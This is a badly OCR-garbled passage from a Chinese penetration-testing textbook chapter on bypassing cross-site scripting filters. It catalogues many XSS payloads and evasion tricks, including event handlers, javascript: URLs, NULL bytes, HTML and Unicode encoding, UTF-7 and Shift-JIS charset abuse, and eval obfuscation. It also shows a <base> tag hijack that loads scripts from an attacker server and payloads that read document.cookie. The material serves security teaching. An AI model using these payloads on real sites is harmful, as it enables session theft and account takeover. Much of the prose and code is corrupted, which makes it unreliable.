在 这 种 情况 下 , 另 一 种 可 以 避 开 某 些 输入 过 滤 的 利用 方法 , 是 在 <input> 标 签 内 注入 一 个 包 
含 JavaScript 的 事件 处 理 句 。 例 如 : 


" onfocus="alert!{(1’ 


@ ||2[|| JavaScript[| [| 

假设 返回 的 页 面 中 包含 以 下 脚本 : 

<Sscript>var a = 'myxsstestdmqlwp'; var b = 123; ... </script> 

这 时 ， 受 控制 的 字符 串 被 卫 接 插入 到 现 有 的 一 段 脚 本 中 。 要 利用 XSS， 可 以 终止 字符 串 周围 
的 单 引 号 ， 用 一 个 分 号 终止 整个 语句 ， 然 后 直接 处 理想 要 执行 的 JavaScript。 例 如 : 

alereill, var Foo 

注意 , 因为 已 经 终止 了 一 个 被 引用 的 字符 串 , 为 阻止 JavaScript 解 释 右 出 现 错误 , 必须 在 注入 
的 代码 后 使 用 有 效 的 语法 确保 脚本 继续 正常 执行 。 在 这 个 示例 中 ， 变 量 foo 被 声明 ， 男 一 个 引用 
字符 串 被 打开 , 它们 将 被 紧 随 在 字符 串 后 面 的 代码 终止 。 男 一 种 经 党 有 效 的 方法 是 使 用 / /结束 输 
入 ， 将 剩 下 的 脚本 当做 注释 处 理 。 

®e {30DURLIUU 

假设 返回 的 页 面 中 包含 以 下 脚本 : 

<a href="'myxsstestdmqlwp">Click here ...</a> 

这 时 , 受 控制 的 字符 串 插 入 到 一 个 <a> 标 签 的 href 属性 中 。 在 一 些 浏 览 器 中 ,这 个 属性 可 能 
包含 一 个 使 用 javascript :协议 的 URL， 从 而 可 以 使 用 以 下 脚本 直接 利用 XSS: 

javascript:alert (1); 

如 前 所 述 ， 因 为 输入 将 反射 到 标签 属性 中 ， 因 此 这 时 还 可 以 注入 一 个 事件 处 理 硕 。 

要 问 当 前 所 有 的 浏览 各 实 施 攻 击 , 可 以 同时 使 用 一 个 无 效 的 图 像 名 称 与 一 个 onerror 事 件 处 
理 售 : 


#"onclick="jJavascript:alert(1) 






































提示 “和 其 他 攻击 一 样 ， 渗 透 测试 员 必 须 对 请 求 中 出 现 的 任何 特殊 字符 进行 URE 编码， 


bd 包括 & 二 十 ;和 空格 。 
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渗透 测 试 步 





对 es 生 醒 ee 的 XSS 源 洞 ， 采 取 以 下 措施 。 

(1) 检查 HTML 源 代码 ， 确 定 受 控制 的 字符 串 的 位 置 。 

(2) 如 采 和 字符 串 出 现在 几 个 位 置 ， 应 将 每 个 位 置 当 做 一 个 潜在 的 漏洞 ， 分 别 进行 分 析 。 

(3) 根据 用 户 控 制 的 字符 串 在 HTML 中 的 人 位置， 确定 需要 如 何 对 其 进行 修改 以 使 任意 
JavaScript 得 以 执行 。 通 常 ， 有 大 量 方法 可 成 为 传送 攻击 的 有 效 工 具 。 

(4) 回应 用 程序 提交 设计 的 字符 串 , 测试 它 是 否 有 用 。 人 
表示 应 用 程序 存在 XSS 漏 洞 。 使 用 一 段 概 念 验证 脚本 显示 一 个 警报 对 话 框 ， 重 复 检 查 语法 是 
正确 ， 并 确定 响应 显示 时 ， 对 话 框 是 否 出 现在 浏览 右 中 。 





3 探查 防御 性 过 滤 
通 负 情况 下 最 初 提 区 的 攻击 字符 串 并 不 会 被 服务 需 按 原样 返回 ， 因 而 无 法 成 功 执行 注入 的 

JavaScript。 如 有 果 是 这 样 ,不 要 放弃 ! 接 下 来 应 该 确定 服务 硕 对 输入 进行 了 哪些 处 理 。 主 要 有 以 下 
3 种 可 能 的 情况 。 

口 应 用 程序 或 者 Web 应 用 程序 防火 增 保 护 的 应 用 程序 发 现 一 个 攻击 签名 ， 完 全 阻止 了 输入 。 

口 应 用 程序 已 经 接受 了 输入 ， 但 对 攻击 字符 串 进 行 了 某 种 净化 或 编码 。 

口 应 用 程序 把 攻击 字符 串 截 短 至 某 个 固定 的 最 大 长 度 。 

ee ee ee 并 讨论 如 果 通 过 每 种 方法 避 开 应 用 程序 设立 的 障碍 。 

在 第 一 和 oe 应 用 程序 通 稼 会 对 攻击 字符 串 做 出 与 无 害 字 符 串 帘 然 不 同 的 啊 应 ， 
例如 ， 通 过 一 条 错误 消息 ， 甚 至 会 指出 发 现 一 个 可 能 的 XSS 攻 击 ， 如 网 12-8 所 示 。 


















































Server Error in / Application. 


A potentially dangerous Request.Form value was detected from the client 
(Searchbox= <asp ). 


Description: Reduest walidation has detected a potentially dangerous cliert input value, and processing of the request has been aborted. This value may 
indicate an attempt to compromise the security of your application, such as a cross-site scripting attack. You can disable request validation by setting 
validateReduest=false in the Page directive or in the configuration section. Hovwvever, t is strongly recommended that Your application explicitly Check all 
inputs in this case. 


Exception Details: System Vyeb .HitpRequestyalidationException: & potentially dangerous Request.Form value was detected from the client 
[searchbhox="<asp"). 


Source Error: 


an unhandled exception was generated during the execution of the current web redquest. 
Information regarding the origin and location of the exception can be identified using the 


exception stack trace below. 





stack Trace: 


图 12-8 一 条 由 ASP.NET 反 XSS 过 滤器 生成 的 错误 消息 


如 果 出 现 这 种 情况 ,那么 接 下 来 ,应 该 确定 输入 中 的 哪些 字符 或 表达 式 触 发 了 过 滤 。 人 
效 的 方法 是 轮流 删除 字符 串 的 不 同 部 分 , 看 输入 是 否 仍然 被 阻止 。 通 音 ， 使 用 这 种 方法 可 迅速 查 
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明 是 否 是 某 个 特殊 的 表达 式 ( 如 <script> ) 造成 请 求 被 阻止 。 如 果 确 实 如 此 ， 那 么 需要 对 过 波 
进行 测试 ， 看 是 否 有 任何 避 开 过 小 的 办 法 。 

有 各 种 不 同 的 方法 可 以 在 HTML 页 面 中 引入 脚本 代码 , 这 些 方法 通 第 能 够 避 开 基于 签名 的 过 
滤 。 因 此 , 测试 员 要 么 找到 引入 脚本 的 其 他 方法 ， 要么 使 用 浏览 带 接 受 的 略 显 畸形 的 语法 。 在 这 
一 广 中 ， 我 们 将 介绍 各 种 执行 脚本 的 不 同方 法 ,然后 说 明 一 系列 可 用 于 避 开 和 常用 过 滤 的 技巧 。 

eDDUDUUU0UUD 

有 4 种 不 同 的 方法 可 用 于 在 HTML 页 面 中 引入 脚本 代码 。 我 们 将 逐一 介绍 这 些 方法 ， 并 提供 
一 些 可 用 于 成 功 避 开 基 于 签名 的 输入 过 小 的 特殊 示例 。 








注解 ”浏览 器 对 于 各 种 HTML 和 脚本 语法 的 支持 各 不 相同 。 个 体 浏览 器 的 行为 也 往往 
会 随 着 新 版 本 的 发 布 而 发 生 改 变 。 因 此 ， 任 何 针 对 个 体 浏 览 器 行为 的 “明确 ”指南 也 
很 快 会 过 时 。 但 是 ， 从 安全 的 角度 看 ， 应 用 程序 需要 在 所 有 当前 和 最 新 版 本 的 常用 浏 
览 器 中 可 靠 运行 。 如 果 XSS 攻 击 只 能 通过 仅 由 少数 用 户 使 用 的 特定 浏览 器 进行 传送 ， 
这 仍然 构成 一 个 漏洞 ， 应 对 其 予以 修复 。 到 本 书 截 稿 时 止 ， 本章 中 提供 的 所 有 示例 至 


六 能 够 在 某 种 注 流 浏览 器 上 运行 。 

为 便于 参考 ,本 章 于 2011 年 3 月 撰写 ， 所 有 描述 的 攻击 至 少 能 够 在 以 下 一 种 浏览 器 
上 实施 : 

口 Internet Explorer 版 本 8.0.7600.16385 ; 

口 Firefox 版 本 3.6.15 。 








e000D 
除 直 接 使 用 <script> 标 签 外 ， 还 可 以 通过 各 种 方法 、 使 用 复杂 的 语法 来 隐藏 标签 ， 从 而 避 
开 某 些 过 滤 : 


<object data="data:text/html,<script>alert (1}</script>"> 
<object data="data:text/html;base64,PHNjcmIwdDShnbCGVydCgxKTwvc2NyaxXBOPg=="> 
<a href="data:text/html;base64,PHNjcmIwdDShnbCGVydCgxKTwvCc2NyaXBOPg=="> 


Click here</a> 
上 例 中 的 基于 Base64 的 字符 串 为 : 
<script>alert (1})</script> 


vUUUUDO 
有 大 量 事件 处 理 带 可 与 各 种 标签 结合 使 用 ， 以 用 于 执行 脚本 。 以 下 是 一 些 较为 少见 的 示例 ， 
可 在 不 需要 任何 用 户 交 互 的 情况 下 执行 脚本 : 


<xml onreadystatechange=alert(1)})> 




















<Sstyle onreadystatechange=alert {1)})> 

<iframe onreadystatechange=alert (1})> 

<object onerror=alert{(1})> 

<object type=image src=valid.gif onreadystatechange=alert (1})></object> 


<img type=image src=valid.gif onreadystatechange=alert!(1)> 
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<input type=image src=valid.gif onreadystatechange=alert (1)> 
<isindex type=image src=valid.gif onreadystatechange=alert (1)> 
<Script onreadystatechange=alert{(1)> 

<bgsound onpropertychange=alert{(1)> 

<body onbeforeactivate=alert{(1)> 

<body onactivate=alert(1)> 

<body onfocusin=alert(1})> 


HTML5 使 用 事件 处 理 右 提供 了 大 量 向 量 。 这 包括 使 用 autofocus 属 性 自动 触发 之 前 需要 用 
户 交 互 的 事件 : 


<input autofocus onfocus=alert (1)> 








<input onblur=alert(1) autofocus><input autofocus> 
<body onscroll=alert {1)><br><br>...<br><input autofocus> 


它 人 允许 在 结束 标签 中 使 用 事件 处 理 顺 : 
</a onmousemove=~alert(1)> 


最 后 ，HTML5 还 通过 事件 处 理 兹 9| 入 了 新 标签 . 


<Video src=1] onerror=alert{(1}>» 





<audio src=1] onerror=alert(1})> 


vUUUUO 

脚本 伪 协 议 可 用 在 各 种 位 置 ， 以 在 需要 UREL 的 属性 中 执行 行内 脚本 。 以 下 是 一 些 示 例 : 
<object data=javascript:alert (1}> 

<iframe src=jJjavascript:alert(1)>» 

<embed src=javascript:alert{1)> 


里 然 上 面 的 示例 主要 使 用 的 是 javascript 伪 协议 , 但 是 ， 还 可 以 在 Internet Explorer 上 使 用 
vbs 协 议 ， 如 本 章 后 面部 分 所 述 。 
和 事件 处 理 希 一 样 ，HTML5 也 提供 一 些 在 XSS 攻 击 中 使 用 脚本 伪 协 议 的 新 方法 : 


<form id=test /><button form=test formaction=javascript:alert(1)> 








<event-source src=javascript:alert{(1)> 


在 针对 输入 过 滤 进 4 Wi 新 的 event-source 标 签 特 别 有 用 。 与 之 前 的 任何 HTML5 标 











签 不 同 , 它 的 名 称 中 包含 一 个 连 子 符 ， 因 此, 使 用 这 个 标签 可 以 避 开 传统 的 、 认 为 标签 名 称 只 能 
包含 字母 的 基于 正则 表 法 式 的 过 + 派 。 
NE 











一 些 浏 览 兹 支持 在 动态 a 以 下 示例 可 以 在 IE7 及 其 早期 版 本 
上 执行 ， 如 果 在 兼容 模式 下 运行 ， 还 可 以 在 后 续 版 本 上 执行 

<x style=x:expression(alert (1))> 

最 新 版 本 的 IE 不 青 文 持 上 述 语 法 ， 因 为 这 些 语 法 只 能 用 在 XSS 攻 击 中 。 但是, 在 最 新 版 本 的 
IE 中 ， 使 用 以 下 请 求 可 以 达到 同样 的 效 采 : 


<x style=behavior:url(#default#time2) onbegin=alert{1)> 


使 用 Firefox 浏 览 器 可 以 通过 moz-binding 属 性 实施 基于 CSS 的 攻击 , 但 是 , 由 于 应 用 程序 已 
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对 这 一 功能 实施 了 限制 ， 现 在 已 经 无 法 通过 它 来 实施 XSS 攻 击 。 

vvUUUUUHIML 

在 前 面 几 节 中 ， 我们 介绍 了 各 种 可 用 于 在 HTML 页 面 中 执行 脚本 代码 的 方法 。 许 多 时 候 ， 你 
会 发 现 , 通过 采用 不 同 的 、 较 为 少见 的 脚本 执行 方法 ， 就 可 以 避 开 基于 签名 的 过 滤 。 如 果 这 种 方 
法 失败 ， 你 就 需要 寻找 其 他 隐藏 攻击 的 方法 。 通 常 ， 你 可 以 引入 过 滤器 接受 的 异常 语法 ， 并 使 浏 
览 需 接受 返回 的 输入 。 在 本 节 中 ,我 们 将 介绍 各 种 对 HTML 请 求 进行 模 灶 处 理 以 避 开 凋 见 的 过 波 
的 方法 。 本 节 对 JavaScript 和 VBScript 语 法 应 用 相同 的 原则 。 

则 在 阻止 XSS 攻 击 的 基于 签名 的 过 滤 通 常 采 用 正则 表达 式 或 其 他 技巧 来 确定 关键 的 HTML 组 
件 ， 如 标签 括号 、 标 签名 称 、 属 性 名 称 和 属性 值 。 例 如 ， 过 滤器 可 能 会 阻止 包含 使 用 已 知 可 用 于 
引入 脚本 的 特殊 标签 或 属性 名 称 的 HIML 的 输入 ， 或 试图 阻止 以 脚本 伪 协 议 开 头 的 属性 值 。 通 过 
以 一 种 或 多 种 浏览 器 接受 的 方式 在 HTML 中 的 关键 位 置 插入 不 常见 的 字符 , 可 以 避 开 其 中 的 许多 
过 渡 。 

我 们 来 了 解 一 下 这 种 技巧 的 用 法 ， 以 下 面 这 上 段 简单 的 脚本 为 例 : 

<img onerror=alert(1) src=a> 

可 以 通过 各 种 方式 修改 这 段 脚本 , 并 使 它 至 少 可 在 一 个 浏览 器 中 运行 。 下 面 我 们 将 分 别 介绍 
这 些 方法 。 实际 上 , 你 可 能 需要 在 一 次 攻击 中 结合 利用 其 中 的 几 种 技巧 ， 以 避 开 更 加 复杂 的 输入 
s 
vUUU0 
从 起 始 标 签名 称 开 始 ， 只 需 改 变 所 使 用 字符 的 大 小 写 ， 即 可 如 开 最 简单 的 过 滤 : 
SiMe .Urnerror=alertily Sre=d> 
更 进一步 ， 可 以 在 任何 位 置 搬 入 NULL 字 他 : 


<[%00]imyg onerror=alert (1)} src=a> 



































蒜 





< [gs00]mg cmnerror=alert (1) src=a> 

(在 以 上 示例 中 ，[%xx] 表 示 十 六 进 制 ASCII 代 码 XX 的 原 义 字符 。 在 回应 用 程序 实施 攻击 时 ， 
通常 会 使 用 字符 的 URL 编 码 形式 。 在 查看 应 用 程序 的 啊 应 时 ， 需 要 在 其 中 寻找 已 解码 的 原 义 字 
和 从。) 














z 提示 。 NULL 字 节 技 巧 可 用 在 Internet Explorer 上 的 HTML 页 面 的 任何 位 置 。 在 XSS 攻 
号 击 中 灵活 使 用 NULEL 字 节 通 常 可 以 快速 避 开 不 探查 下 行为 的 基于 签名 的 过 滤 。 


事实 证 明 ， 使 用 NULL 字 节 可 以 有 效 避 开 配 置 为 阻止 包含 已 知 攻击 字符 串 的 请 求 


的 Web 应 用 程序 防火 墙 (WAF )。 为 了 提高 性 能 ，WAF 通 第 以 本 地 代码 编写 ， 因 此 ， 
NULEL 字 节 将 终止 在 其 中 出 现 的 字符 串 。 这 样 ，WAFE 就 无 法 发 现 NULEL 字 节 之 后 的 恶意 
有 效 载荷 (请 参阅 第 16 章 了 解 详细 信息 )。 





更 进一步 , 如 采 你 对 上 面 示例 中 的 标签 名 称 稍 做 修改 , 就 可 以 使 用 任意 标签 名 称 引 入 事件 处 
理 副 ， 从 而 避 开 仅仅 阻止 特定 标签 名 称 的 过 渡 : 
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<X onclick=alert{1}) src=a>Click here</x> 

有 时 ,可 以 引入 不 同名 称 的 新 标签 , 但 却 找 不 到 使 用 这 些 标签 直接 执行 代码 的 方法 。 在 这 些 
情况 下 , 可 以 使 用 一 种 称 为 “基本 标签 劫持 ”的 技巧 来 实施 攻击 。<base> 标 签 用 于 指定 一 个 URL， 
浏览 锅 应 使 用 该 URL 解 析 随 后 在 页 面 中 出 现 的 任何 相对 URL。 如 宁可 以 引入 一 个 新 的 <base>， 
并 且 页 面 执行 反射 点 后 的 任何 使 用 相对 UREL 的 <script>， 则 你 就 可 以 指定 一 个 指 回 受 你 控制 的 
服务 硕 的 基本 URL。 当 浏览 硕 加 载 在 HTML 页 面 的 剩余 部 分 指定 的 脚本 时 ， 这 些 脚 本 将 从 指定 的 
服务 硕 加 载 ， 但 仍然 能 够 在 调用 它们 的 页 面 中 执行 。 例 如 : 


<base href="hnttp://mdattacker.net/badscripts/"> 














<SCript src="goodscript.js'"></script> 
根据 规范 ， <base> 标 签 应 出 现在 HTML 页 面 的 <headq> 部 分 。 但 是 ,一 些 浏览 需 ， 如 Firefox ， 
人 允许 <base> 标 签 出 现在 页 面 的 任何 位 置 ， 这 显著 扩大 了 这 种 攻击 的 范围 。 


YUUOUOOUOO0OO0OD0UDO 

一 些 字 符 可 用 于 和 蔡 代 标签 名 称 与 第 一 个 属性 名 称 之 间 的 空格 : 
<img/onerror=alert(1) src=a> 

<img[%09]onerror=alert (1) src=a> 


<img[%0Od]jonerror=alert (1) src=a> 


(1 
<img[%S0alonerror=alert(1) src=a> 
<img/"onerror=alert(1) src=a> 
<img/'onerror=alert(1) src=a> 


<img/anyjunk/onerror=alert{(1)} src=a> 
需要 注意 的 是 ,即使 在 实施 攻击 时 不 需要 任何 标签 属性 , 仍然 应 始终 在 标签 名 称 后 面 添加 一 
些 多 余 的 内 容 ， 因 为 这 样 做 可 以 避 开 一 些 简 单 的 过 滤 : 


<script/anyjunk>alert (1)</script> 


v0OUDOD 
也 可 以 在 属性 名 称 中 使 用 上 述 NULL 字 节 技 巧 。 这 样 做 可 以 避 开 许多 试图 通过 阻止 以 on 开头 
的 属性 名 称 来 阻止 事件 过 滤 需 的 简单 过 滤 : 


<img ol[l%00]jnerror=alert (1) src=a> 


vUUUUD 
在 最 初 的 示例 中 , 属性 值 之 间 并 未 分 隅 开 来 ,因而 逢 要 在 属性 值 后 面 插入 一 些 空格 , 表示 属 
性 值 已 结束 ， 以 便于 添加 其 他 属性 。 属 性 可 以 选择 使 用 双 引 号 或 单 引号 进行 分 隔 ， 或 在 下 上 使 用 




















/Ar AN 
重音 人 符 分 隔 : 
<img onerror="alert (1}'"src=a> 
<img onerror='alert (1})}'src=a> 
<img onerror= alert(1) src=a> 


前 面 的 示例 提供 了 另 一 种 方法 , 可 用 于 避 开 一 些 检查 以 on 开头 的 属性 名 称 的 过 滤器 。 如 果 过 
滤器 不 知道 重音 符 被 用 作 属 性 分 隔 符 , 它 会 将 下 面 的 示例 视 为 仅 包含 一 个 属性 , 其 名 称 不 再 为 事 
件 处 理 器 的 名 称 : 
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<imd src= a onerror=alert {1)> 
通过 使 用 引号 分 隔 的 属性 , 并 在 标签 名 称 后 面 插入 异常 字符 ,就 可 以 设计 出 不 逢 要 使 用 任何 
空格 的 攻击 ， 从 而 避 开 一 些 简 单 的 过 滤 : 


<img/onerror="alert (1)'"src=a> 


尝试 访问 
http://mdsec.net/search/69/ 


http://mdsec.net/search/72/ 
http://mdsec.net/search/75/ 








Y 加 目测 
在 属性 值 中 ， 可 以 使 用 NULL 字 节 技 巧 。 还 可 以 使 用 HTML 编码 的 字符 ， 如 下 所 未: 


<img onerror=al%00]lert(1)} src=a> 





<img onerror=a&#x6éc;ert (1) src=a> 

在 进一步 处 理 属性 值 之 前 ， 浏 览 絮 会 对 其 进行 HTML 解 码 ， 因 此 ， 可 以 使 用 HTML 编 码 对 肢 
本 代码 进行 模糊 处 理 , 从 而 避 开 任何 过 滤 。 例 如 , 以 下 攻击 避 开 了 许多 试图 阻止 JavaScript 伪 协议 
处 理 器 的 过 滤 : 

<iframe src=j&#H#x61 ;vasc&#x72ipt&#x3a;alert&#x28;1&#x29; > 

在 使 用 HTML 编 码 时 , 值得 注意 的 是 , 浏览 需 接 受 规范 的 各 种 变 体 , 甚至 可 能 忽略 过 滤 需 “ 意 
识 到 ”的 HTML 编码 问题 。 可 以 使 用 十 进 制 和 十 六 进 制 格式 ， 添 加 多 余 的 前 导 零 ， 并 省 略 结尾 的 
分 号 。 以 下 示例 至 少 可 以 用 在 一 种 浏览 絮 中 : 


<img onerror=at&k#tx0O6c;ert(1) src=a> 














<img onerror=a&#x006c;ert (1) src=a> 
<img onerror=a&#x0006c;ert(1})} src=a> 
<imd onerror=a&t1l08;ert(1) src=a> 
<imdg onerror=a&ti#to1l08;ert(1) src=a> 





<imgdg onerror=a&t#tl0O8ert(1) src=a> 





<1img onerror=ag&#0108ert (1)} src=a> 


Y 山口 册 
有 些 时 候 , 通过 利用 奇怪 的 应 用 程序 或 浏览 硕 行 为 ,甚至 可 以 使 用 无 效 的 标签 括号 ， 并 且 仍 
然 使 浏览 锅 按 攻击 所 需 的 方式 处 理 相关 标签 。 
一 些 应 用 程序 在 应 用 输入 过 滤 后 还 执行 不 必要 的 URL 解 码 ， 因 此 ， 请 求 中 的 以 下 输入 
$253cimg%20o0nerror=alert (1)%20src=a%253e 
被 应 用 程序 服务 大 进行 URL 解 但， 然后 将 以 下 输入 传递 给 应 用 程序 : 
$3cimg onerror=alert (1) src=a$®S3e 
其 中 并 不 包含 任何 标签 括号 ， 因 此 不 会 被 输入 过 滤 阻 止 。 但 是 , 应 用 程序 随后 会 执行 第 二 次 URL 
解 公 ， 因 此 输入 将 变 为 : 
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<img onerror=alert(1) src=a> 

该 输入 会 回 显 给 用 户 ， 导 致 攻击 得 以 实施 。 12 
如 第 2 章 所 述 , 如 果 应 用 程序 框架 基于 字形 和 发 音 的 相似 性 , 将 不 常见 的 Unicode 字 符 “ 转 换 ” 

为 它们 最 接近 的 ASCII 字 符 , 这 时 可 能 会 出 现 与 上 述 示例 类 似 的 情况 。 例 如 ,以 下 输入 使 用 Unicode 

双 角 引号 (su00AB 和 gu00BB )， 而 不 是 标签 括号 : 














«imd onerror=alert(1}) src=a» 
应 用 程序 的 输入 过 小 可 能 会 允许 该 输入 ， 因 为 其 中 并 不 包含 任何 有 问题 的 HTML。 但 是 ， 如 果 应 
用 程序 框架 在 输入 被 插入 到 啊 应 中 时 将 引号 转换 为 标签 字符， 攻击 将 取得 成 功 。 事实 证 明 ， 由 于 
开发 者 的 巩 包 ， 大 量 应 用 程序 都 多 于 受到 这 种 攻击 。 

一 些 输入 过 滤 通 过 简单 地 匹配 起 始 和 结束 尖 括 号 ,提取 内 容 , 并 将 其 与 标签 名 称 黑 名 单 进行 
比较 来 识别 HTML 标 签 。 在 这 种 情况 下 ， 可 以 通过 使 用 多 余 的 括号 ( 如 果 浏 览 絮 接受 ) 来 避 开 
过 滤 : 

<<script>alert (1);//<</scrip 

某 些 情况 下 ， 可 以 利用 浏览 右 的 HTML 解 析 恬 的 异常 行为 来 实施 攻击 ， 从 而 避 开 应 用 程序 的 
输入 过 滤 。 例 如 ， 以 下 HTML 使 用 了 ECMAScript for XML ( E4X )， 其 中 并 不 包含 有 效 的 起 始 脚 
本 标签 ， 但 仍然 可 以 在 当前 版 本 的 Firefox 中 执行 包含 的 脚本 : 


<Sscript<{alert (1)}/></script> 


























提示 “在 上 述 用 于 避 开 过 滤 的 各 种 技巧 中 ， 实 施 攻击 的 HTML 虽然 存在 缺陷 ， 但 仍 被 
客户 端 浏览 器 所 接受 。 由 于 有 大 量 相 当 合法 的 网 站 包含 并 不 严格 遵循 标准 的 HTML， 
这 导致 浏览 器 接受 各 种 各 样 存 在 问题 的 HTML。 在 呈现 页 面 之 前 ， 这 些 浏览 器 会 在 后 
台 有 效 地 修复 相关 错误 。 通 常 ， 在 反常 情况 下 尝试 调整 攻击 方式 时 ， 查 看 浏览 器 基于 


服务 器 的 具体 响应 构建 的 虚拟 HTML 会 有 所 帮助 。 在 Firefox 中 , 可 以 使 用 WebDeveloper 
工具 ， 该 工具 提供 的 “查看 生成 的 源 ”(View Generated Source ) 功能 正好 可 用 于 完成 
上 述 任 务 。 





这 四 加 加 

有 些 时 候 可 以 使 用 一 种 非常 强大 的 方法 , 致使 应 用 程序 接受 攻击 有 效 载 集 的 非 标准 编码 ， 从 
而 避 开 各 种 类 型 的 过 小 。 下 面 的 示例 说 明了 字符 串 <script>alert (document .cookie) 
</ script> 的 一 些 非 标 准 编 码 表示 法 

UTF-7 








+ADW- ScCript+AD4-alert (document .cookie})+ADw- /script+AD4- 


US-ASCII 


BC 73 63 72 69 70 74 BE 61 6C 65 72 74 28 64 6F ; Yscript¥halert {doc 


340 第 12 章 攻击 其 他 用 户 


63 75 6D 65 6E 74 2E 63 6F 6F 6B 69 65 29 BC 2F ; cument.cookie}W/ 


73 63 72 69 70 74 BE ; SCI1ipPtM 

UTF-16 
FF FE 3C O00 73 00 63 00 72 00 69 00 70 00 74 00 ; Yb<.s.c.r.1.p.t. 
3E 00 61 00 6C 00 65 00 72 00 74 00 28 00 64 00 ; >,a.l.e.r.t.!(.d. 
6F O00 63 00 75 00 6D 00 65 00 6E 00 74 00 2E 00 ; O.C.U.M.E.N.t... 
63 00 6F O00 6F 00 6B 00 69 00 65 00 29 00 3C 00 ; c.o.o.k.i.e.).<. 
2F 00 73 00 63 00 72 00 69 00 70 00 74 00 3E 00 ; /.S.C.rT.1.p.t.,>. 





这 些 编码 后 的 字符 串 可 避 开 许多 常见 的 反 XSS 过 滤 。 实 施 成 功 攻击 的 挑战 在 于 如 何 使 浏览 
售 使 用 所 需 的 字符 集 来 解释 啊 应 ,如 果 你 控制 了 HTTP content- Type 消息 头 或 其 对 应 的 HTML 
元 标签 ， 就 可 以 使 用 非 标准 字符 集 避 开 应 用 程序 的 过 滤 ， 使 浏览 器 按照 需要 的 方式 解释 有 效 载 
荷 。 一 些 应 用 程序 在 革 些 请 求 中 提交 charset 参 数 ， 多 许 直 接 设置 在 应 用 程序 的 响应 中 使 用 的 
字符 集 。 

如 采 应 用 程序 默认 使 用 多 字 市 字符 

些 输 入 




















集 ， 如 Shift-JIS， 这 时 ， 可 以 通过 提交 在 所 采用 的 字符 集 
过 滤 。 例如 , 假设 应 用 程序 的 响应 中 返回 了 以 下 两 段 用 户 














中 具有 特殊 意义 的 字符 来 避 开 其 
输入 : 
<img src="image.gif" alt="[input1l]" /> ... [input2. 


对 于 input1， 应 用 程序 会 阻止 包含 引号 的 输入 ， 以 防止 攻击 者 终止 引用 的 属性 。 对 于 
input2， 应 用 程序 会 阻止 包含 尖 括 号 的 输入 ， 以 防止 攻击 者 使 用 任何 HTML 标 签 。 这 种 过 滤 似 
平 较为 可 靠 , 但是， 攻击 者 可 以 通过 使 用 以 下 两 个 输入 来 实施 攻击 : 

input1l: [gftO] 

input2: "onload=alert(1): 


在 Shift-JIS 字 符 集 中 , 各 种 原始 字 节 值 (包括 0xf0 ) 用 于 表示 由 该 字 节 及 随后 的 字 节 组 成 的 2 
字 节 字符 。 因 此 ， 浏览 器 在 处 理 input1l 时 ，0xf0 字 节 后 面 的 引号 将 被 解释 为 一 个 2 字 节 字符 的 一 
部 分 , 而 不 是 属性 值 的 分 隔 符 。HTML 解 析 器 将 继续 运行 ， 直到 到 达 input2 提 供 的 引号 位 置 (该 
引号 终止 了 属性 )， 从 而 允许 攻击 者 提交 将 作为 其 他 标签 属性 解释 的 事件 处 理 硕 : 

Im Sroe= imye. gif" alt=" 7» .,, onload=alert(1y; 

在 广泛 使 用 的 字符 集 UTF-8 中 发 现 这 种 漏洞 时 ， 浏览 右 供应 商 发 布 了 一 个 补丁 ,阻止 了 相关 
攻击 。 但是, 这 些 攻击 当前 仍然 能 够 在 某 些 浏览 器 上 成 功 实施 ,它们 主要 针对 是 其 他 一 些 较 少 使 
用 的 多 字 节 字符 集 ， 包 括 Shift-JIS、EUC-JP 和 BIG5 。 

eUU0000000 

某 些 情况 下 ， 可 以 找到 办 法 来 操纵 反射 型 输入 ， 从 而 在 应 用 程序 的 响应 中 插入 脚本 。 但 是 ， 
可 能 会 遇 到 各 种 其 他 障碍 ， 无 法 执行 实施 有 效 攻击 所 需 的 代码 。 这 时 ， 机 到 的 过 滤 通 常会 试图 
阻止 你 使 用 某 些 JavaScript 关 键 字 和 其 他 表达 式 。 它 们 还 可 能 阻止 有 用 的 字符 ， 如 引号 、 括 号 和 
圆 点 。 

和 使 用 HTML 对 攻击 进行 模糊 处 理 一 样 ， 也 可 以 通过 使 用 各 种 技巧 来 修改 所 需 的 脚本 代码 ， 
以 避 开 常见 的 输入 过 滤 。 
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v [LU JavaScript[| [| 

JavaScript 人 允许 各 种 字符 转 义 ， 可 以 通过 这 种 方式 避免 包含 原 义 格式 的 表达 式 。 

Unicode 转 义 可 用 于 表示 JavaScript 关 键 字 中 的 字符 ， 从 而 避 开 许多 类 型 的 过 滤 

<script>a\u006cert (1);</script> 

如 有 果 能 够 使 用 eval 命 令 (通过 利用 之 前 介绍 的 技巧 来 转 义 它 的 某 些 字符 )， 就 可 以 将 其 他 命 
令 以 字符 串 格 式 传送 给 eval 命 令 ， 从 而 执行 这 些 命 令 。 这 样 ， 就 可 以 利用 各 种 字符 串 操 纵 技 巧 
来 隐藏 执行 的 命令 。 

在 JavaScript 字 符 串 中 ， 可 以 使 用 Unicode 转 义 、 十 六 进 制 转 义 和 八进制 转 义 : 


























<script>eval('a\u006cert (1}');</script> 
<Sscript>eval('a\xbécert(1})'});</script> 

<Script>eval('a\lS4ert (1})');</script> 

此 外 ， 字 符 串 中 的 多 余 转 义 字 符 将 被 忽略 : 
<Sscript>eval('a\l\ert\(1\}');</script> 

vUUUUUUD 

可 以 使 用 其 他 技巧 来 动态 构建 在 攻击 中 使 用 的 字符 串 : 
<Sscript>eval('al'+'ert(1)');</script> 

<Sscript>eval (String.fromCharCode (97,108,101,114,116,40,49,41})};</script> 
<Script>eval (atob('amF2YXNjcmlwdDphbGVydCgqxKOQ')});</script> 








上 面 的 示例 可 在 Firefox 上 执行 ， 可 以 通过 它 解码 Base64 编 码 的 命令 ， 然 后 将 其 传递 给 eval， 


vUUevalUUDU 
如 果 无 法 直接 调用 eval 命 令 ， 可 以 通过 其 他 方法 以 字符 串 格式 执行 命令 : 


<Script>'alert(1)'.replace(/.+/,eval})</script> 
<script>function::['alert'] (1})}</script> 
v0 

如 果 圆 点 被 阻止 ， 可 以 使 用 以 下 方法 解 引 用 : 
<Sscript>alert (document['cookie'])</script> 


<Script>with{({document)alert (cookie)</script> 

vUDUUUUUD 

到 现在 为 止 ， 我们 介绍 的 各 种 技巧 通常 都 可 以 组 合 使 用 ， 以 对 攻击 进行 多 层 模糊 人 处理。 在 
HTML 标 签 属性 中 使 用 JavaScript (通过 事件 处 理 器 、 脚 本 伪 协 议 或 动态 求 值 的 样式 ) 的 情况 下 ， 
可 以 将 这 些 技巧 与 HTML 编码 组 合 使 用 。 浏 览 硕 会 对 标签 属性 值 进行 HTML 解码， 然后 再 解释 其 
